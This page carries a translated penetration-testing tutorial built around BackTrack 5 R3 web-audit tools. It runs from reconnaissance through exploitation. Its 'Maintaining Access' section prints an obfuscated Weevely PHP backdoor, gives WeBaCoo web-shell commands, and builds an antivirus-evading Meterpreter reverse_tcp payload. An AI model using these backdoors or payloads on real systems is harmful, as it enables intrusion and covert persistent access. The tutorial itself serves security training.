Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Angeliki Cooney
 

Último (20)

Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptx
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
 

Computer security

  • 1. Computer Security Written by Caleb Bucker Pen-Tester – Ethical Hacker – Security Researcher http://calebbucker.blogspot.com/ http://www.twitter.com/CalebDrugs https://www.facebook.com/caleb.bucker mailto:calebbucker@gmail.com The Original Copy in Spanish Language http://www.sendspace.com/file/gyljvj                                 PENETRATION TESTING Web Analysis ‐ Vulnerability Assessment – Exploitation  Translated By   Mohamed Abdel Azim Mohamed   
  • 2. Index    • INTRODUCTION • METHODS OF ANALYSIS OF WEB APPLICATIONS 1. NETWORK MAPPING • Nmap • Netifera 2. INFORMATION GATHERING • TheHarvester • Maltego 3. CMS IDENTIFICATION • BlindElephant • CMS-Explorer • WhatWeb 4. IDS/IPS DETECTION • Waffit 5. OPEN SOURCE ANALYSIS • GHDB (Google Hacking DataBase) • Xssed 6. WEB CRAWLERS • WebShag • DirBuster 7. VULNERABILITY ASSESSMENT AND EXPLOITATION • JoomScan • SqlMap • Fimap • Shodan • W3af • Uniscan • Nikto 8. MAINTAINING ACCESS • Weevely • WeBaCoo • MsfPayload 9. CONCLUSIÓN
  • 3. INTRODUCTION Today, as many of us (Pen-tester's) we know that in these times the Analysis of Web Applications play a very important role in making a Safety Evaluation and / or Penetration Testing, as this gives us the appropriate information about web Application, such as the type of plugin you use, either types of Joomla CMS - WordPress or other. This will help us to determine what we should use Exploit, or see exactly how to exploit the vulnerabilities that can occur when performing penetration testing. Penetration Testing tests are also used to determine the level of security: a computer, a computer network LAN (Local Area Network) or WLAN (Wireless Local Area Network), among other Web applications, using identical simulated computer attacks those who conduct a Black Hat Hacker, or Cracker but without compromising the information or the availability of services, this is done in order to identify the potential threats in iT systems before the attacker discovers a (external or internal ). This process is also known as Ethical Hacking (Ethical Hacking). To perform this procedure Penetration Testing, BackTrack 5 R3 is used, a Linux distro based on Ubuntu perfectly made to carry out these tests, as it comes with a set of very important tools that do much to get all the necessary information about web applications, among others. BackTrack Wiki: http://www.backtrack-linux.org/wiki/ Descarga: http://www.backtrack-linux.org/downloads/
  • 4. METHODS OF ANALYSIS OF WEB APPLICATIONS: 1. NETWORK MAPPING: Network Mapping is the study of the physical network connectivity. Mapping Internet is the study of the physical connectivity of the Internet. Network Mapping is often determine the servers and operating systems running on the network. The law and ethics of port scans are complex. An analysis of the network can be detected by humans or automated systems, and is treated as a malicious act. In the BackTrack suite includes NMAP, a tool that we all know for its power and effectiveness in performing their work, which is very useful to us to carry out this method so important in a Web Audit. • NMAP: Nmap ("Network Mapper") is an open source tool for network exploration and security auditing. Nmap uses IP packets "raw" ("raw", NT) in original ways to determine what hosts are available on a network, what services (name and version of the application) offering, what operating systems (and their versions) running, what type of packet filters or firewalls are in use, and dozens of other characteristics. Use: nmap www.sitio-web.com nmap 192.168.1.1
  • 5. NETIFERA: Netifera is a network scanner can scan passive (analyzing a pcap file, network sniffing lives) and assets of analysis (analysis of port entity). Identifies the network hosts. This project offers many advantages for security developers and researchers who want to implement new tools as well as the community of users of these tools. This tool is included in BackTrack and is located at the following address: Applications - BackTrack - Information Gathering - Network Analysis - Identify Live Hosts – Netifera The usage is very easy, just have to put the web address where it says: ... Type Address enter pressed and we will come out with the target website's and IP's to which will audit.: In this case I placed the website: www.paypal.com in which I made Reverse lookup, TCP Connect Scan UDP Scan, Crawler, NS Lookup, Brute Force Host Name
  • 6. 2. INFORMATION GATHERING The first phase of safety assessment focuses on gathering information as much as possible about a web application. Gathering information is the most critical step of a test web application security. This task can be accomplished in many different ways, using public tools (search engine) scanner, simple sending HTTP requests or requests specially designed, it is possible to apply force to the filter information, for example, the disclosure error message or versions and technologies used. There are basically two types of data collection: active and passive. Passive information gathering is that attackers will not communicate directly with the target and are trying to gather information that is available on the Internet, while in the active collection of information, the attacker will be in direct contact with the object and will be trying to gather information. • THEHARVESTER: The Harvester is a tool to collect email accounts, user names and host names or sub domains from different public sources such as search engines and PGP key servers. Use: /pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -l 500 -b google /pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -b pgp /pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -l 200 -b linkedin • MALTEGO: Maltego is a tool that is based on the application information and forensic and shows how information is connected to each other. With Maltego, we can find relationships that people mostly use today, including your social profile (Facebook - Twitter), mutual friends, businesses that relate to the information gathered, and websites. If we collect information regarding any infrastructure, we can gather relationship between domains and DNS names. Location: Applications - Backtrack - Information Gathering - Network Analysis - DNS Analysis – Maltego
  • 8. 3. CMS IDENTIFICATION • BLINDELEPHANT: BlindElephant is a python based tool that is used for Web Application Fingerprinting. The tool is quick, has low bandwidth and is highly automated. Use /pentest/web/blindelephant/src/blindelephant# ./BlindElephant.py http://sitio-web.com/ cms • CMS-EXPLORER: Fingerprinting serves for web applications, can also be used to identify the type of CMS used, therefore, the attack is done according to the obtained information. Use: /pentest/enumeration/web/cms-explorer# ./cms-explorer.pl -url http://sitio-web.com/ -type cms
  • 9. WHATWEB: It is another tool used to identify the type of content management systems (CMS), blogging platform, statistics, and servers used Javascript libraries.Has 900 Plugins for web analytics purposes. Use: /pentest/enumeration/web/whatweb# ./whatweb http://sitio-web.com/ /pentest/enumeration/web/whatweb# ./whatweb -v http://sitio-web.com/ /pentest/enumeration/web/whatweb# ./whatweb -a 3 http://sitio-web.com/ /pentest/enumeration/web/whatweb# ./whatweb 192.168.1.1/24 4. IDS/IPS DETECTION During the realization of a VA / PT in a domain, the possibility exists that the IDS-IPS services are installed, this can sometimes stop several types of attacks that are made in the domain. A lot of WAF (Web Application Firewall) are sold to companies as a successful technique for mitigating vulnerabilities in Web applications. Luckily, WAF is easy to detect, because most of these use signature-based detection methods, therefore, the attacker can try to encode parameters and try bypassear attack the WAF. In the BackTrack suite includes a useful tool for the detection of IDS-IPS, which is Waffit. • WAFFIT: It is a tool that detects possible Firewall you may have a web server, it is of little use, since detecting the firewall behind the domain is a very important step in the process of penetration testing. Use: /pentest/web/waffit# ./wafw00f.py http://sitio-web.com/
  • 10.
  • 11. 5. OPEN SOURCE ANALYSIS Open-Source Analysis is performed using tools like GHDB, revhosts and XSSed. The GHDB (Google Hack Data Base) and XSSed are linked to websites, while rev hosts is a console tool. • GHDB: Google Hacking Database, the exploit-db team maintains a database for Google Dork's that can greatly help in Pen-tester's information gathering. We can use the dork's to find certain types of vulnerable servers or other information. For example, a Google dork like "Microsoft-IIS/6.0" intitle: index.of "can be used to detect servers running on Microsoft IIS 6.0. • XSSED: http://www.xssed.com/ a website that contains a list of websites vulnerable to Cross Site Scripting (XSS), by various authors. It can be opened from: Applications - Backtrack - Information Gathering - Web Application Analysis - Open Source Analysis - Xssed. 6. WEB CRAWLERS In this last category of Web Analysis, famous Crawlers are used, this will help much to list the files and folders "hidden" inside a web server. The BackTrack suite has many tools to perform this type of analysis such as the DIRB, Golismero, SQLScan, Deblaze and WebShag. • WEBSHAG: Webshag is a tool programmed in Python, which combines the features useful for Auditing Web Servers as web crawling, URL scanning or file fuzzing. Webshag can be used to analyze a web server in HTTP or HTTPS, through a proxy and using HTTP authentication (Basic and Digest).
  • 12. Besides innovative features proposed IDS evasion, intended that the correlation between the application more complicated (for example, using a random sample for each proxy server HTTP request). It can be opened from Applications - BackTrack - Information Gathering - Web Application Analysis - Web Crawlers - WebShag Gui. • DIRBUSTER: DirBuster is a Java application designed to make Brute Force in the directories and files in web server / application. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within it, then try to find these DirBuster. DirBuster is a total of 9 different lists, this makes DirBuster extremely effective in finding hidden files and directories. And if that was not enough DirBuster also has the option of making a pure Brute Force. It can be found at the following location: Applications - BackTrack - Vulnerabylity Assessment - Web Application Assessment - Web Application Fuzzers – DirBuster
  • 13.
  • 14. 7. VULNERABILITY ASSESSMENT AND EXPLOITATION The stage of vulnerability assessment is where you can explore our goal for errors, but before a vulnerability assessment, gathering information about the target is much more useful. The information gathering phase remains the key step before further attacks, simply because it makes the job easier, for example, in the first stage in the use of scanners to identify the CMS as BlindElephant, was scanned and found the version of the installed application. Now, at the stage of vulnerability assessment, you can use many tools (scanners) that will help a lot to find vulnerabilities in respective specific web server. • JOOMSCAN: It is a Perl-based tool that is used to identify known vulnerabilities such as SQL Injection, XSS or other, on web servers based on the Joomla platform. • Detects the version of Joomla! is running. • Scan and locate known vulnerabilities in Joomla! and its extensions. • It reports in text or HTML format. • Allow immediate updating via a scanner or svn. • type Detects vulnerabilities: SQL injection, LFI, RFI, XSS and others. It can be opened from /pentest/web/joomscan# ./joomscan.pl -u www.sitio-web.com • SQLMAP: It is a tool that helps automate the process of detecting and exploiting SQL injection vulnerabilities allowing full access to the database of Web servers. It can be opened from /pentest/database/sqlmap# ./sqlmap.py -u http://www.sitio-web.com/ --dbs
  • 15. FIMAP: It is a small tool programmed in python which can find, prepare, audit and automatically exploiting Remote File Inclusion errors in web applications. Is currently under development, but it is usable. The objective is to improve the quality Fimap and security of your website. It can be opened from /pentest/web/fimap# ./fimap.py -u http://localhost/test.php?file=bang&id=23 /pentest/web/fimap# ./fimap.py -g -q 'noticias.php?id='
  • 16. SHODAN: This is another site evaluation tool, particular utility for pentesters. It can be used to collect a series of intelligent information about devices that are connected to the Internet. We can, for example, look to see if all network devices such as routers, VoIP, printers, cameras, etc., are in place. To find if a service is running in the domain, the syntax would be: • hostname: port target.com: 80,21,22 If we simply want to know the results on the host name, simply, the syntax would be: • hostname: target.com • W3AF: Audit is a tool for web applications security, is basically divided into several modules such as Attack, Audit, Exploit, Discovery, and Brute Force Evasion, which can all be used accordingly. These modules come with several modules w3af side, for example, we can select the module XSS Audit assuming it is necessary to perform a particular audit. It can be opened from Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web Vulnerability Scanners - w3af
  • 17. Once the analysis is complete, w3af shows detailed information about the vulnerabilities found in the specified website, which can compromise accordingly for further exploitation.
  • 18. UNISCAN: A Web Vulnerability Scanner, led to computer security, aimed at finding vulnerabilities in web systems. It is licensed under GNU GENERAL PUBLIC LICENSE 3.0 (GPL 3). Uniscan is developed in Perl, has easy handling of regular expressions and is also multi-threaded. Features: • identification system pages via a web crawler. • Proof of pages found through the GET method. • Test the forms found by the POST method. • Support for SSL requests (HTTPS). • Supports Proxy. • Generate list of sites via Google. • Generate list of sites with Bing. • Client GUI written using perl tk. It can be downloaded from the following link: http://uniscan.sourceforge.net/?page_id=7 it can be opened from ./uniscan.pl -u http://www.sitio-web.com/ -qweds • NIKTO: It is a web server scanner which performs comprehensive tests against web servers for multiple items, including over 6500 files / CGIs potentially dangerous controls outdated versions of over 1250
  • 19. servers, and version specific problems on over 270 servers. It also checks the server configuration elements, such as the presence of multiple index files and HTTP server options. Nikto is a robust project that has been several years in development and is constantly evolving. Some of the most interesting features of this tool include the ability to generate reports in various formats, integration with LibWhisker (Anti-IDS), integration with Metasploit, among others. it can be opened from Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web Vulnerability Scanners - Nikto Use: /pentest/web/nikto# ./nikto.pl -host www.sitio-web.com 8. MAITAINING ACCESS Once you access the website (goal), we need to maintain access for future use, because we will not be starting from scratch again and again. To avoid this, we can load the shell backdoors's web or the web page. The coding of the tailgate is also important, as not to create "noise" when loaded on the server. If so, then administrators can easily detect and remove the rear doors. In BackTrack 5 R3 suite incorporates good tools to carry out this process, which are: • WEEVELY: It is an essential tool for the further exploitation of web applications, and can be used as a back door or a web shell to manage web accounts. Weevely search functions like system (), passthru (), popen (), exec (), proc_open (), shell_exec (), pcntl_exec (), perl-> system (), python_eval ()) using activated functions in a server remote. The following code is an example of the code of the backdoor created by Weevely. -------------------------------------------------------------------------------------------------------------------
  • 20. eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwk YSk7IGlmKHJlc2V0KCRhKT09J2luJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGZv c2VjPic7ZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luK GFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9mb3NlYz4nO30=')); ------------------------------------------------------------------------------------------------------------------- It can be opened from Applications - BackTrack - Maintaining Access - Web BackDoors - Weevely Use: /pentest/backdoors/web/weevely# ./weevely.py generate password /root/back.php /pentest/backdoors/web/weevely# ./weevely.py http://www.sitio-web.com/back.php password • WEBACOO: WeBaCoo (Web Backdoor Cookie) is a backdoor that provides a terminal connection over HTTP between client and web server. It is an exploitation tool to maintain access to a web server (hacked). It was designed to operate under the radar of modern up-to-dated AV, NIDS, IPS, Network Firewalls and Application Firewalls, proving stealth mechanism to execute commands on the compromised server. File obfuscated performs communication via HTTP header's Cookie validating HTTP requests and responses from the web server. WeBaCoo provides a way to generate the code to create the PHP backdoor using predefined payloads. It also offers the "terminal" mode in which the user can establish a remote connection to the server and execute commands with privileges of the web service desired. The download is available from Github: https://github.com/anestisb/WeBaCoo Options: 1) Create obfuscated backdoor 'backdoor.php' with default settings: •. / Webacoo.pl-g-o backdoor.php 2) Create 'raw-backdoor.php' backdoor de-obfuscated using the work "transit": •. / webacoo.pl-g-o raw-backdoor.php-f 4-r 3) Set "terminal" connection to the remote host using the default settings: •. / webacoo.pl-t-u http://127.0. 0.1/backdoor.php 4) Set "terminal" connection to the remote host to configure some arguments: •. / webacoo.pl-t-u-c http://127.0.0.1/backdoor.php "Test-Cookie" - d "TTT"
  • 21. 5) Set "terminal" connection to the remote host via HTTP proxy: •. / webacoo.pl-t-u-p 127.0.0.1:8080 http://10.0.1.13/backdoor.php 6 ) Set "terminal" connection to the remote host via HTTP proxy with basic authentication: •. / webacoo.pl-t-u-p http://10.0.1.13/backdoor.php user: password: 10.0.1.8: 3128 7) Set "terminal" connection to the remote host via Tor and record activity: •. / webacoo.pl-t-u-p http://example.com/backdoor.php tor-l webacoo_log.txt • MSFPAYLOAD: Metasploit can be used to create backdoors that can then be used to maintain access to the web server. This can be done with the help of msfpayload. The steps to create backdoor msfpayload are as follows: We have to select the Payload that we will use to get a Meterpreter shell generated through a reverse TCP connection. The command would be: msfpayload windows/meterpreter/reverse_tcp This Payload has two parameters: lhost (our IP) and LPORT to select the port that we will use. The "R" is used for the output file in RAW data format so that we can then encode. msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R This command will create the payload, but it has to be coded to avoid antivirus detection for that matter can be done using the msfencode option to do this, we need to use pipe ("|") windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R| msfencode –e x86/shikata_ga_nai –t exe >> bucker.exe -e is used to specify the encoding necessary in this case I'm using the encoding shikata_ga_nai and-t for the type of file extension (exe). For example, if we want to see the list of available encoders MSF, use the following command: msfpayload windows/meterpreter/reverse_tcp -l
  • 22. 9. CONCLUSION These are only a few methods you can follow to make the exploitation of vulnerabilities in a web application. Once we have the information about our goal, try to perform a vulnerability assessment in order to obtain information about the exploits that can be used. Once done, exploit vulnerabilities and, if necessary, load a backdoor, but before that, you must encode the backdoor to avoid detection. I hope this will help you find the vulnerability, exploitation and how to maintain access to your target. My Greeting. References: http://en.wikipedia.org/wiki/Penetration_test http://www.giac.org/certification/web-application-penetration-tester-gwapt http://www.offensive-security.com/information-security-training/penetration-testing-with-backtrack/ https://www.owasp.org/index.php/Web_Application_Penetration_Testing